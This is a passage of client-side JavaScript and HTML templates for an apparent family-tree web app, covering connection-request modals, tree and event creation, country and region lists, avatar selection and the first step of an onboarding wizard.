                <div id="send-connection-request-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="modal-content bg-white rounded-lg shadow-xl max-w-md w-full mx-4 p-6 transform scale-95 transition-transform duration-300">
                        <div class="flex items-center justify-between mb-4">
                            <h3 class="text-xl font-semibold">Send Connection Request</h3>
                            <button onclick="closeSendConnectionRequestModal()" class="text-gray-400 hover:text-gray-600">
                                ${tablerIcon('x', { size: 24, preserveColor: true })}
                            </button>
                        </div>

                        <p class="text-gray-600 mb-4">Send a connection request to <strong>${escapeHtml(userName)}</strong></p>

                        <form onsubmit="sendConnectionRequest(event); return false;" class="space-y-4">
                            <div>
                                <label class="block text-sm font-medium text-gray-700 mb-1">Relationship Type (Optional)</label>
                                <select id="connection-relationship-type" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <option value="">No relationship (tree access only)</option>
                                    <option value="sibling">Sibling</option>
                                    <option value="parent">Parent</option>
                                    <option value="child">Child</option>
                                    <option value="cousin">Cousin</option>
                                    <option value="aunt/uncle">Aunt/Uncle</option>
                                    <option value="niece/nephew">Niece/Nephew</option>
                                    <option value="grandparent">Grandparent</option>
                                    <option value="grandchild">Grandchild</option>
                                    <option value="other">Other Relative</option>
                                </select>
                                <p class="mt-1 text-xs text-gray-500">Select a relationship to add them to your family tree, or leave blank to only share tree access</p>
                            </div>

                            <div>
                                <label class="block text-sm font-medium text-gray-700 mb-1">Message (Optional)</label>
                                <textarea
                                    id="connection-message"
                                    rows="3"
                                    placeholder="Add a personal message..."
                                    class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary"
                                ></textarea>
                            </div>

                            <div id="send-connection-error" class="text-sm text-red-600"></div>

                            <div class="flex justify-end gap-3">
                                <button type="button" onclick="closeSendConnectionRequestModal()" class="px-4 py-2 bg-gray-200 text-gray-700 rounded-md hover:bg-gray-300">
                                    Cancel
                                </button>
                                <button type="submit" id="send-connection-btn" class="btn btn-primary">
                                    Send Request
                                </button>
                            </div>
                        </form>
                    </div>
                </div>
            `;

            // Remove existing modal if any
            const existingModal = document.getElementById('send-connection-request-modal');
            if (existingModal) existingModal.remove();

            // Add modal to page
            document.body.insertAdjacentHTML('beforeend', modalHtml);

            // Show modal
            setTimeout(() => {
                const modal = document.getElementById('send-connection-request-modal');
                modal?.classList.remove('pointer-events-none', 'opacity-0');
                modal?.querySelector('.modal-content')?.classList.remove('scale-95');
                modal?.querySelector('.modal-content')?.classList.add('scale-100');
            }, 10);
        }

        function closeSendConnectionRequestModal() {
            const modal = document.getElementById('send-connection-request-modal');
            if (modal) {
                modal.classList.add('opacity-0');
                modal.querySelector('.modal-content')?.classList.add('scale-95');
                setTimeout(() => modal.remove(), 300);
            }
            pendingConnectionRequest = null;
        }

        // Send connection request
        async function sendConnectionRequest(event) {
            event.preventDefault();

            if (!pendingConnectionRequest) return;

            const relationshipType = document.getElementById('connection-relationship-type').value.trim();
            const message = document.getElementById('connection-message').value.trim();
            const errorDiv = document.getElementById('send-connection-error');
            const submitBtn = document.getElementById('send-connection-btn');

            errorDiv.textContent = '';
            submitBtn.disabled = true;
            submitBtn.textContent = 'Sending...';

            try {
                await apiFetch(`${API_BASE_URL}/connection-requests`, {
                    method: 'POST',
                    body: {
                        toUserId: pendingConnectionRequest.userId,
                        relationshipType: relationshipType || null,
                        message: message || null
                    }
                });

                closeSendConnectionRequestModal();
                alert('Connection request sent successfully!');

                // Clear search results
                const searchInput = document.getElementById('family-search-input');
                if (searchInput) searchInput.value = '';
                const resultsDiv = document.getElementById('family-search-results');
                if (resultsDiv) resultsDiv.innerHTML = '<p class="text-center text-gray-500 text-sm py-8">Start typing to search for family members</p>';

            } catch (error) {
                console.error('Error sending connection request:', error);
                errorDiv.textContent = error.message || 'Failed to send request';
                submitBtn.disabled = false;
                submitBtn.textContent = 'Send Request';
            }
        }

        // Accept connection request
        async function acceptConnectionRequest(requestId) {
            if (!confirm('Accept this connection request?')) return;

            try {
                await apiFetch(`${API_BASE_URL}/connection-requests/${requestId}/accept`, {
                    method: 'POST'
                });

                alert('Connection request accepted!');
                loadConnectionRequests('received');
                loadPendingRequestsCount();

            } catch (error) {
                console.error('Error accepting connection request:', error);
                alert('Failed to accept request: ' + error.message);
            }
        }

        // Decline connection request
        async function declineConnectionRequest(requestId) {
            if (!confirm('Decline this connection request?')) return;

            try {
                await apiFetch(`${API_BASE_URL}/connection-requests/${requestId}/decline`, {
                    method: 'POST'
                });

                alert('Connection request declined');
                loadConnectionRequests('received');
                loadPendingRequestsCount();

            } catch (error) {
                console.error('Error declining connection request:', error);
                alert('Failed to decline request: ' + error.message);
            }
        }

        // --- END CONNECTION TAB FUNCTIONS ---

        async function handleCreateEvent(event) {
            event.preventDefault();
            const errorDiv = document.getElementById('create-event-error');
            errorDiv.textContent = '';
            try {
                const title = document.getElementById('event-title').value;
                const calendarId = document.getElementById('event-calendar').value;
                const startTime = document.getElementById('event-start-time').value;
                const endTime = document.getElementById('event-end-time').value;
                if (!calendarId || calendarId === "") throw new Error("Please select a calendar.");
                await apiFetch(`${API_BASE_URL}/calendars/${calendarId}/event`, { method: 'POST', body: { title, startTime, endTime, user_id: appState.currentUserNeo4jId } });
                closeModal('create-event-modal');

                // Refresh calendar views
                await loadAllCalendarEvents();
                renderCurrentCalendarView();
                renderUpcomingEvents();

                // Reset form
                document.getElementById('create-event-form').reset();
            } catch (error) {
                errorDiv.textContent = error.message;
            }
        }

        async function handleCreateTree(event) {
            event.preventDefault();
            const errorDiv = document.getElementById('create-tree-error');
            errorDiv.textContent = '';

            try {
                // Collect form data
                const treeName = document.getElementById('tree-name').value.trim();
                const userName = document.getElementById('user-name').value.trim();
                const personFirstName = document.getElementById('person-first-name').value.trim();
                const personLastName = document.getElementById('person-last-name').value.trim();
                const personBirthYear = document.getElementById('person-birth-year').value;
                const personBirthMonth = document.getElementById('person-birth-month').value;
                const personBirthDay = document.getElementById('person-birth-day').value;
                const personGender = document.getElementById('person-gender').value;

                // Validate required fields
                if (!treeName || !userName || !personFirstName || !personLastName) {
                    throw new Error("Please fill in all required fields.");
                }

                // Create the tree
                const response = await apiFetch(`${API_BASE_URL}/trees`, {
                    method: 'POST',
                    body: {
                        treeName,
                        userName,
                        personFirstName,
                        personLastName,
                        personBirthYear: personBirthYear ? parseInt(personBirthYear) : null,
                        personBirthMonth: personBirthMonth ? parseInt(personBirthMonth) : null,
                        personBirthDay: personBirthDay ? parseInt(personBirthDay) : null,
                        personGender: personGender || null
                    }
                });

                // Update app state with new user ID
                if (response.user && response.user.id) {
                    appState.currentUserNeo4jId = response.user.id;
                }

                // Close modal and reload the app
                closeModal('create-tree-modal');

                // Show success message and reload
                alert(`Success! Your family tree "${treeName}" has been created.`);

                // Reload the page to initialize with the new tree
                window.location.reload();

            } catch (error) {
                errorDiv.textContent = error.message || "Failed to create family tree. Please try again.";
            }
        }

        // --- ONBOARDING WIZARD LOGIC ---

        // ---- COUNTRY/STATE DATA ----
        // ISO 3166-1 alpha-2 codes. Sorted by display name. Covers:
        //   - All 54 African countries (core audience)
        //   - All EU/EEA + UK + Switzerland (GDPR scope + heritage diaspora)
        //   - Major diaspora destinations (US, Canada, Caribbean, Gulf, etc.)
        //   - A handful of other commonly-encountered countries
        const COUNTRIES = [
            { code: 'DZ', name: 'Algeria' },
            { code: 'AO', name: 'Angola' },
            { code: 'AR', name: 'Argentina' },
            { code: 'AU', name: 'Australia' },
            { code: 'AT', name: 'Austria' },
            { code: 'BS', name: 'Bahamas' },
            { code: 'BB', name: 'Barbados' },
            { code: 'BE', name: 'Belgium' },
            { code: 'BJ', name: 'Benin' },
            { code: 'BW', name: 'Botswana' },
            { code: 'BR', name: 'Brazil' },
            { code: 'BG', name: 'Bulgaria' },
            { code: 'BF', name: 'Burkina Faso' },
            { code: 'BI', name: 'Burundi' },
            { code: 'CV', name: 'Cabo Verde' },
            { code: 'CM', name: 'Cameroon' },
            { code: 'CA', name: 'Canada' },
            { code: 'CF', name: 'Central African Republic' },
            { code: 'TD', name: 'Chad' },
            { code: 'CN', name: 'China' },
            { code: 'KM', name: 'Comoros' },
            { code: 'CG', name: 'Congo (Republic)' },
            { code: 'CD', name: 'Congo (DRC)' },
            { code: 'CI', name: "Côte d'Ivoire" },
            { code: 'HR', name: 'Croatia' },
            { code: 'CY', name: 'Cyprus' },
            { code: 'CZ', name: 'Czechia' },
            { code: 'DK', name: 'Denmark' },
            { code: 'DJ', name: 'Djibouti' },
            { code: 'EG', name: 'Egypt' },
            { code: 'GQ', name: 'Equatorial Guinea' },
            { code: 'ER', name: 'Eritrea' },
            { code: 'EE', name: 'Estonia' },
            { code: 'SZ', name: 'Eswatini' },
            { code: 'ET', name: 'Ethiopia' },
            { code: 'FI', name: 'Finland' },
            { code: 'FR', name: 'France' },
            { code: 'GA', name: 'Gabon' },
            { code: 'GM', name: 'Gambia' },
            { code: 'DE', name: 'Germany' },
            { code: 'GH', name: 'Ghana' },
            { code: 'GR', name: 'Greece' },
            { code: 'GN', name: 'Guinea' },
            { code: 'GW', name: 'Guinea-Bissau' },
            { code: 'HU', name: 'Hungary' },
            { code: 'IS', name: 'Iceland' },
            { code: 'IN', name: 'India' },
            { code: 'ID', name: 'Indonesia' },
            { code: 'IE', name: 'Ireland' },
            { code: 'IL', name: 'Israel' },
            { code: 'IT', name: 'Italy' },
            { code: 'JM', name: 'Jamaica' },
            { code: 'JP', name: 'Japan' },
            { code: 'KE', name: 'Kenya' },
            { code: 'LV', name: 'Latvia' },
            { code: 'LS', name: 'Lesotho' },
            { code: 'LR', name: 'Liberia' },
            { code: 'LY', name: 'Libya' },
            { code: 'LI', name: 'Liechtenstein' },
            { code: 'LT', name: 'Lithuania' },
            { code: 'LU', name: 'Luxembourg' },
            { code: 'MG', name: 'Madagascar' },
            { code: 'MW', name: 'Malawi' },
            { code: 'MY', name: 'Malaysia' },
            { code: 'ML', name: 'Mali' },
            { code: 'MT', name: 'Malta' },
            { code: 'MR', name: 'Mauritania' },
            { code: 'MU', name: 'Mauritius' },
            { code: 'MX', name: 'Mexico' },
            { code: 'MA', name: 'Morocco' },
            { code: 'MZ', name: 'Mozambique' },
            { code: 'NA', name: 'Namibia' },
            { code: 'NL', name: 'Netherlands' },
            { code: 'NZ', name: 'New Zealand' },
            { code: 'NE', name: 'Niger' },
            { code: 'NG', name: 'Nigeria' },
            { code: 'NO', name: 'Norway' },
            { code: 'PH', name: 'Philippines' },
            { code: 'PL', name: 'Poland' },
            { code: 'PT', name: 'Portugal' },
            { code: 'RO', name: 'Romania' },
            { code: 'RW', name: 'Rwanda' },
            { code: 'ST', name: 'São Tomé and Príncipe' },
            { code: 'SA', name: 'Saudi Arabia' },
            { code: 'SN', name: 'Senegal' },
            { code: 'SC', name: 'Seychelles' },
            { code: 'SL', name: 'Sierra Leone' },
            { code: 'SG', name: 'Singapore' },
            { code: 'SK', name: 'Slovakia' },
            { code: 'SI', name: 'Slovenia' },
            { code: 'SO', name: 'Somalia' },
            { code: 'ZA', name: 'South Africa' },
            { code: 'KR', name: 'South Korea' },
            { code: 'SS', name: 'South Sudan' },
            { code: 'ES', name: 'Spain' },
            { code: 'SD', name: 'Sudan' },
            { code: 'SE', name: 'Sweden' },
            { code: 'CH', name: 'Switzerland' },
            { code: 'TZ', name: 'Tanzania' },
            { code: 'TG', name: 'Togo' },
            { code: 'TT', name: 'Trinidad and Tobago' },
            { code: 'TN', name: 'Tunisia' },
            { code: 'TR', name: 'Turkey' },
            { code: 'UG', name: 'Uganda' },
            { code: 'AE', name: 'United Arab Emirates' },
            { code: 'GB', name: 'United Kingdom' },
            { code: 'US', name: 'United States' },
            { code: 'ZM', name: 'Zambia' },
            { code: 'ZW', name: 'Zimbabwe' },
        ];

        // Subdivisions for countries where the dropdown is more useful than free text.
        // Other countries fall through to a text input via renderStateDropdown.
        // For the UK, the four 'states' are actually constituent countries (England,
        // Scotland, Wales, Northern Ireland) — the field label calls itself
        // "State / Province / Region" to cover all three terminologies.
        const STATES_BY_COUNTRY = {
            'AE': ['Abu Dhabi', 'Ajman', 'Dubai', 'Fujairah', 'Ras Al Khaimah', 'Sharjah', 'Umm Al Quwain'],
            'AU': ['Australian Capital Territory', 'New South Wales', 'Northern Territory', 'Queensland', 'South Australia', 'Tasmania', 'Victoria', 'Western Australia'],
            'CA': ['Alberta', 'British Columbia', 'Manitoba', 'New Brunswick', 'Newfoundland and Labrador', 'Northwest Territories', 'Nova Scotia', 'Nunavut', 'Ontario', 'Prince Edward Island', 'Quebec', 'Saskatchewan', 'Yukon'],
            'CM': ['Adamawa', 'Centre', 'East', 'Far North', 'Littoral', 'North', 'Northwest', 'South', 'Southwest', 'West'],
            'DE': ['Baden-Württemberg', 'Bavaria', 'Berlin', 'Brandenburg', 'Bremen', 'Hamburg', 'Hesse', 'Lower Saxony', 'Mecklenburg-Vorpommern', 'North Rhine-Westphalia', 'Rhineland-Palatinate', 'Saarland', 'Saxony', 'Saxony-Anhalt', 'Schleswig-Holstein', 'Thuringia'],
            'EG': ['Alexandria', 'Aswan', 'Asyut', 'Beheira', 'Beni Suef', 'Cairo', 'Dakahlia', 'Damietta', 'Faiyum', 'Gharbia', 'Giza', 'Ismailia', 'Kafr el-Sheikh', 'Luxor', 'Matrouh', 'Minya', 'Monufia', 'New Valley', 'North Sinai', 'Port Said', 'Qalyubia', 'Qena', 'Red Sea', 'Sharqia', 'Sohag', 'South Sinai', 'Suez'],
            'ES': ['Andalusia', 'Aragon', 'Asturias', 'Balearic Islands', 'Basque Country', 'Canary Islands', 'Cantabria', 'Castile and León', 'Castilla-La Mancha', 'Catalonia', 'Ceuta', 'Extremadura', 'Galicia', 'La Rioja', 'Madrid', 'Melilla', 'Murcia', 'Navarre', 'Valencia'],
            'ET': ['Addis Ababa', 'Afar', 'Amhara', 'Benishangul-Gumuz', 'Dire Dawa', 'Gambela', 'Harari', 'Oromia', 'Sidama', 'Somali', 'South Ethiopia', 'South West Ethiopia', 'Southern Nations, Nationalities and Peoples', 'Tigray'],
            'FR': ['Auvergne-Rhône-Alpes', 'Bourgogne-Franche-Comté', 'Bretagne', 'Centre-Val de Loire', 'Corse', 'Grand Est', 'Guadeloupe', 'Guyane', 'Hauts-de-France', 'Île-de-France', 'La Réunion', 'Martinique', 'Mayotte', 'Normandie', 'Nouvelle-Aquitaine', 'Occitanie', 'Pays de la Loire', "Provence-Alpes-Côte d'Azur"],
            'GB': ['England', 'Northern Ireland', 'Scotland', 'Wales'],
            'GH': ['Ahafo', 'Ashanti', 'Bono', 'Bono East', 'Central', 'Eastern', 'Greater Accra', 'North East', 'Northern', 'Oti', 'Savannah', 'Upper East', 'Upper West', 'Volta', 'Western', 'Western North'],
            'IE': ['Carlow', 'Cavan', 'Clare', 'Cork', 'Donegal', 'Dublin', 'Galway', 'Kerry', 'Kildare', 'Kilkenny', 'Laois', 'Leitrim', 'Limerick', 'Longford', 'Louth', 'Mayo', 'Meath', 'Monaghan', 'Offaly', 'Roscommon', 'Sligo', 'Tipperary', 'Waterford', 'Westmeath', 'Wexford', 'Wicklow'],
            'IT': ['Abruzzo', 'Aosta Valley', 'Apulia', 'Basilicata', 'Calabria', 'Campania', 'Emilia-Romagna', 'Friuli-Venezia Giulia', 'Lazio', 'Liguria', 'Lombardy', 'Marche', 'Molise', 'Piedmont', 'Sardinia', 'Sicily', 'Trentino-Alto Adige', 'Tuscany', 'Umbria', 'Veneto'],
            'KE': ['Baringo', 'Bomet', 'Bungoma', 'Busia', 'Elgeyo-Marakwet', 'Embu', 'Garissa', 'Homa Bay', 'Isiolo', 'Kajiado', 'Kakamega', 'Kericho', 'Kiambu', 'Kilifi', 'Kirinyaga', 'Kisii', 'Kisumu', 'Kitui', 'Kwale', 'Laikipia', 'Lamu', 'Machakos', 'Makueni', 'Mandera', 'Marsabit', 'Meru', 'Migori', 'Mombasa', "Murang'a", 'Nairobi', 'Nakuru', 'Nandi', 'Narok', 'Nyamira', 'Nyandarua', 'Nyeri', 'Samburu', 'Siaya', 'Taita-Taveta', 'Tana River', 'Tharaka-Nithi', 'Trans-Nzoia', 'Turkana', 'Uasin Gishu', 'Vihiga', 'Wajir', 'West Pokot'],
            'NG': ['Abia', 'Adamawa', 'Akwa Ibom', 'Anambra', 'Bauchi', 'Bayelsa', 'Benue', 'Borno', 'Cross River', 'Delta', 'Ebonyi', 'Edo', 'Ekiti', 'Enugu', 'FCT', 'Gombe', 'Imo', 'Jigawa', 'Kaduna', 'Kano', 'Katsina', 'Kebbi', 'Kogi', 'Kwara', 'Lagos', 'Nasarawa', 'Niger', 'Ogun', 'Ondo', 'Osun', 'Oyo', 'Plateau', 'Rivers', 'Sokoto', 'Taraba', 'Yobe', 'Zamfara'],
            'RW': ['Eastern Province', 'Kigali', 'Northern Province', 'Southern Province', 'Western Province'],
            'SA': ['Al Bahah', 'Al Jawf', 'Al Madinah', 'Al-Qassim', 'Asir', 'Eastern Province', "Ha'il", 'Jazan', 'Makkah', 'Najran', 'Northern Borders', 'Riyadh', 'Tabuk'],
            'SN': ['Dakar', 'Diourbel', 'Fatick', 'Kaffrine', 'Kaolack', 'Kédougou', 'Kolda', 'Louga', 'Matam', 'Saint-Louis', 'Sédhiou', 'Tambacounda', 'Thiès', 'Ziguinchor'],
            'TZ': ['Arusha', 'Dar es Salaam', 'Dodoma', 'Geita', 'Iringa', 'Kagera', 'Katavi', 'Kigoma', 'Kilimanjaro', 'Lindi', 'Manyara', 'Mara', 'Mbeya', 'Morogoro', 'Mtwara', 'Mwanza', 'Njombe', 'Pemba North', 'Pemba South', 'Pwani', 'Rukwa', 'Ruvuma', 'Shinyanga', 'Simiyu', 'Singida', 'Songwe', 'Tabora', 'Tanga', 'Unguja North', 'Unguja South', 'Zanzibar Urban/West'],
            'UG': ['Central', 'Eastern', 'Northern', 'Western'],
            'US': ['Alabama', 'Alaska', 'Arizona', 'Arkansas', 'California', 'Colorado', 'Connecticut', 'Delaware', 'District of Columbia', 'Florida', 'Georgia', 'Hawaii', 'Idaho', 'Illinois', 'Indiana', 'Iowa', 'Kansas', 'Kentucky', 'Louisiana', 'Maine', 'Maryland', 'Massachusetts', 'Michigan', 'Minnesota', 'Mississippi', 'Missouri', 'Montana', 'Nebraska', 'Nevada', 'New Hampshire', 'New Jersey', 'New Mexico', 'New York', 'North Carolina', 'North Dakota', 'Ohio', 'Oklahoma', 'Oregon', 'Pennsylvania', 'Rhode Island', 'South Carolina', 'South Dakota', 'Tennessee', 'Texas', 'Utah', 'Vermont', 'Virginia', 'Washington', 'West Virginia', 'Wisconsin', 'Wyoming'],
            'ZA': ['Eastern Cape', 'Free State', 'Gauteng', 'KwaZulu-Natal', 'Limpopo', 'Mpumalanga', 'North West', 'Northern Cape', 'Western Cape'],
        };

        const onboardingState = {
            currentStep: 1,
            totalSteps: 5,
            firebaseUser: null,
            authToken: null,
            data: {
                // Account info (collected on auth page before onboarding)
                email: '',
                userFirstName: '',
                userMiddleName: '',
                userLastName: '',
                // Tree search (step 2)
                skipTreeSearch: false,
                selectedTreeId: null,

                // Step 1: Tell Us About You
                birthYear: '',
                birthMonth: '',
                birthDay: '',
                gender: '',
                birthCity: '',
                birthState: '',
                birthTown: '',
                birthCountry: '',
                currentCity: '',
                currentState: '',
                currentTown: '',
                currentCountry: '',
                profilePicture: null,
                profileAvatarType: 'none',  // 'upload' | 'dicebear' | 'none'
                profileAvatarSeed: '',
                profileAvatarSkin: 'ae5d29',
                treeName: '',
                // Phase 3: privacy choice for the user's own Person.
                // Captured at Step 5 of the wizard. Default 'visible' — heritage
                // product value depends on data being seen, but the wizard step
                // makes the choice explicit so it isn't an unconsented default.
                privacyMode: 'visible',

                // Step 2: First Connection (Parents)
                motherFirstName: '',
                motherLastName: '',
                fatherFirstName: '',
                fatherLastName: '',

                // Step 3: User Role
                userRole: 'exploring'
            }
        };

        // ---- HELPER FUNCTIONS ----

        function formatLocation(city, town, state, country) {
            const parts = [city];
            if (town) parts.push(town);
            parts.push(state, country);
            return parts.filter(Boolean).join(', ');
        }

        function getYearOptions() {
            const currentYear = new Date().getFullYear();
            const years = [];
            // Show years from current year down to 1800 (covers 7+ generations)
            // Age validation (13+) will be done on form submission
            for (let year = currentYear; year >= 1800; year--) {
                years.push(year);
            }
            return years;
        }

        function getMonthOptions() {
            return [
                { value: '1', label: 'January' },
                { value: '2', label: 'February' },
                { value: '3', label: 'March' },
                { value: '4', label: 'April' },
                { value: '5', label: 'May' },
                { value: '6', label: 'June' },
                { value: '7', label: 'July' },
                { value: '8', label: 'August' },
                { value: '9', label: 'September' },
                { value: '10', label: 'October' },
                { value: '11', label: 'November' },
                { value: '12', label: 'December' }
            ];
        }

        function getDayOptions(month, year) {
            if (!month || !year) return Array.from({ length: 31 }, (_, i) => i + 1);
            const daysInMonth = new Date(year, month, 0).getDate();
            return Array.from({ length: daysInMonth }, (_, i) => i + 1);
        }

        function renderCountryDropdown(id, selectedValue = '') {
            return `
                <select id="${id}" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" onchange="handleCountryChange('${id}')">
                    <option value="">Select Country</option>
                    ${COUNTRIES.map(country => `
                        <option value="${country.code}" ${selectedValue === country.code ? 'selected' : ''}>${country.name}</option>
                    `).join('')}
                </select>
            `;
        }

        function renderStateDropdown(id, countryCode, selectedValue = '') {
            const states = STATES_BY_COUNTRY[countryCode] || [];
            if (states.length === 0) {
                // No predefined subdivisions for this country — let the user type.
                return `<input type="text" id="${id}" placeholder="State, province, region, or county" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" value="${selectedValue}">`;
            }
            return `
                <select id="${id}" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" onchange="handleStateChange('${id}')">
                    <option value="">Select…</option>
                    ${states.map(state => `
                        <option value="${state}" ${selectedValue === state ? 'selected' : ''}>${state}</option>
                    `).join('')}
                </select>
            `;
        }

        function handleCountryChange(countryFieldId) {
            const countryCode = document.getElementById(countryFieldId).value;
            const stateFieldId = countryFieldId.replace('Country', 'State');
            const stateContainer = document.getElementById(stateFieldId + '-container');

            // Preserve the current state selection before re-rendering
            const currentStateField = document.getElementById(stateFieldId);
            const currentStateValue = currentStateField ? currentStateField.value : '';

            if (stateContainer) {
                // Pass the current state value - it will be preserved if valid for the new country
                // Include the label in the replacement to maintain proper structure
                stateContainer.innerHTML = `
                    <label class="block text-xs text-gray-600 mb-1">State / Province / Region *</label>
                    ${renderStateDropdown(stateFieldId, countryCode, currentStateValue)}
                `;

                // After re-rendering, check if we need to hide city for DC
                handleStateChange(stateFieldId);
            }
        }

        function handleStateChange(stateFieldId) {
            const stateField = document.getElementById(stateFieldId);
            if (!stateField) return;

            const stateValue = stateField.value;
            const cityFieldId = stateFieldId.replace('State', '-city');
            const cityField = document.getElementById(cityFieldId);

            if (cityField && cityField.parentElement) {
                // Hide city field if District of Columbia is selected
                if (stateValue === 'District of Columbia') {
                    cityField.parentElement.style.display = 'none';
                    cityField.removeAttribute('required');
                    cityField.value = 'Washington'; // Auto-fill city as Washington
                } else {
                    cityField.parentElement.style.display = 'block';
                    cityField.setAttribute('required', 'required');
                    // Clear the auto-filled value if switching away from DC
                    if (cityField.value === 'Washington') {
                        cityField.value = '';
                    }
                }
            }
        }

        function generateDiceBearAvatarUrl(seed, style = 'avataaars', skinColor = null) {
            let url = `https://api.dicebear.com/7.x/${style}/svg?seed=${seed}`;
            if (skinColor) {
                url += `&skinColor=${skinColor}`;
            }
            // Family-friendly filters: exclude vomit, crying, eyepatch, etc.
            url += '&mouth=default,smile&eyes=default,happy&accessoriesProbability=0';
            return url;
        }

        function showAvatarPicker() {
            const modal = document.getElementById('avatar-picker-modal');
            if (modal) {
                modal.classList.remove('hidden', 'opacity-0', 'pointer-events-none');
                modal.classList.add('flex', 'opacity-100');
            }
        }

        function closeAvatarPicker() {
            const modal = document.getElementById('avatar-picker-modal');
            if (modal) {
                modal.classList.add('hidden', 'opacity-0', 'pointer-events-none');
                modal.classList.remove('flex', 'opacity-100');
            }
        }

        function selectDiceBearAvatar(seed, skin = 'ae5d29') {
            onboardingState.data.profileAvatarType = 'dicebear';
            onboardingState.data.profileAvatarSeed = seed;
            onboardingState.data.profileAvatarSkin = skin;
            onboardingState.data.profilePicture = null;

            // Update preview
            const preview = document.getElementById('avatar-preview');
            if (preview) {
                preview.innerHTML = `<img src="${generateDiceBearAvatarUrl(seed, 'avataaars', skin)}" alt="Avatar" class="w-24 h-24 rounded-full">`;
            }

            closeAvatarPicker();
        }

        function handleAvatarUpload(event) {
            const file = event.target.files[0];
            if (!file) return;

            // Validate file
            if (!file.type.match('image.*')) {
                alert('Please select an image file');
                return;
            }

            if (file.size > 5 * 1024 * 1024) {
                alert('File size must be less than 5MB');
                return;
            }

            // Read file as base64
            const reader = new FileReader();
            reader.onload = (e) => {
                onboardingState.data.profileAvatarType = 'upload';
                onboardingState.data.profilePicture = file;
                onboardingState.data.profileAvatarSeed = '';
                onboardingState.data.profileAvatarSkin = '';

                // Update preview
                const preview = document.getElementById('avatar-preview');
                if (preview) {
                    preview.innerHTML = `<img src="${e.target.result}" alt="Avatar" class="w-24 h-24 rounded-full object-cover">`;
                }
            };
            reader.readAsDataURL(file);
        }

        function skipAvatar() {
            onboardingState.data.profileAvatarType = 'none';
            onboardingState.data.profilePicture = null;
            onboardingState.data.profileAvatarSeed = '';
            onboardingState.data.profileAvatarSkin = '';
        }

        // ---- PROGRESS PERSISTENCE ----

        function saveOnboardingProgress() {
            try {
                localStorage.setItem('onboardingProgress', JSON.stringify({
                    currentStep: onboardingState.currentStep,
                    // Q5: persist the joined-existing-tree flag so the wizard's
                    // step skipping + completion path survive page reloads.
                    joinedExistingTree: !!onboardingState.joinedExistingTree,
                    data: {
                        ...onboardingState.data,
                        profilePicture: null  // Don't save file to localStorage
                    },
                    timestamp: Date.now()
                }));
            } catch (error) {
                console.error('Failed to save onboarding progress:', error);
            }
        }

        function loadOnboardingProgress() {
            try {
                const saved = localStorage.getItem('onboardingProgress');
                if (!saved) return false;

                const progress = JSON.parse(saved);

                // Check if progress is less than 24 hours old
                const hoursSinceLastSave = (Date.now() - progress.timestamp) / (1000 * 60 * 60);
                if (hoursSinceLastSave > 24) {
                    localStorage.removeItem('onboardingProgress');
                    return false;
                }

                // Restore progress
                onboardingState.currentStep = progress.currentStep;
                if (progress.joinedExistingTree) {
                    onboardingState.joinedExistingTree = true;
                }
                Object.assign(onboardingState.data, progress.data);

                return true;
            } catch (error) {
                console.error('Failed to load onboarding progress:', error);
                return false;
            }
        }

        function clearOnboardingProgress() {
            localStorage.removeItem('onboardingProgress');
        }

        function renderOnboardingStep(step) {
            const stepsContainer = document.getElementById('onboarding-steps');
            if (!stepsContainer) return;

            // B30b: hide the tree-name-collision chip strip on every step
            // transition. The strip lives at the wizard level so it survives
            // step renders; without this it would persist visibly onto Step 4
            // (or wherever the user navigated) after a collision on Step 3.
            // completeOnboarding re-shows it if there's still a collision.
            const altsStrip = document.getElementById('tree-name-alternatives');
            if (altsStrip) {
                altsStrip.classList.add('hidden');
                altsStrip.innerHTML = '';
            }

            let stepHTML = '';

            switch(step) {
                case 1: // Tell Us About You
                    const years = getYearOptions();
                    const months = getMonthOptions();

                    stepHTML = `
                        <div class="space-y-6">
                            <div>
                                <h2 class="text-2xl font-semibold text-gray-800 mb-2">Tell Us About You</h2>
                                <p class="text-sm text-gray-500">Help us create your profile and family tree</p>
                            </div>

                            <!-- Name (2026-09-12: added to Step 1 to close the gap where an IDP
                                 signup with a null user.displayName left state empty; also lets any
                                 user review/correct the name they typed at signup form). Prefills
                                 from state populated by handleSignup (email/password) OR
                                 _handleIdpPostSignin (Google/Facebook). -->
                            <div>
                                <label class="block text-sm font-medium text-gray-700 mb-2">Your Name *</label>
                                <div class="grid grid-cols-1 sm:grid-cols-2 gap-3">
                                    <div>
                                        <input id="onboard-user-first-name" type="text" required placeholder="First name" value="${escapeHtml(onboardingState.data.userFirstName || '')}" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                    <div>
                                        <input id="onboard-user-last-name" type="text" required placeholder="Last name" value="${escapeHtml(onboardingState.data.userLastName || '')}" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                </div>
                                <input id="onboard-user-middle-name" type="text" placeholder="Middle name (optional)" value="${escapeHtml(onboardingState.data.userMiddleName || '')}" class="w-full px-3 py-2 mt-3 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                            </div>

                            <!-- Date of Birth -->
                            <div>
                                <label class="block text-sm font-medium text-gray-700 mb-2">Date of Birth *</label>
                                <div class="grid grid-cols-1 sm:grid-cols-3 gap-3">
                                    <div>
                                        <input id="onboard-birth-year" type="number" required placeholder="YYYY" min="1800" max="${new Date().getFullYear()}" value="${onboardingState.data.birthYear || ''}" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" onchange="updateBirthDays()">
                                    </div>
                                    <div>
                                        <select id="onboard-birth-month" required class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" onchange="updateBirthDays()">
                                            <option value="">Month</option>
                                            ${months.map(month => `<option value="${month.value}" ${onboardingState.data.birthMonth == month.value ? 'selected' : ''}>${month.label}</option>`).join('')}
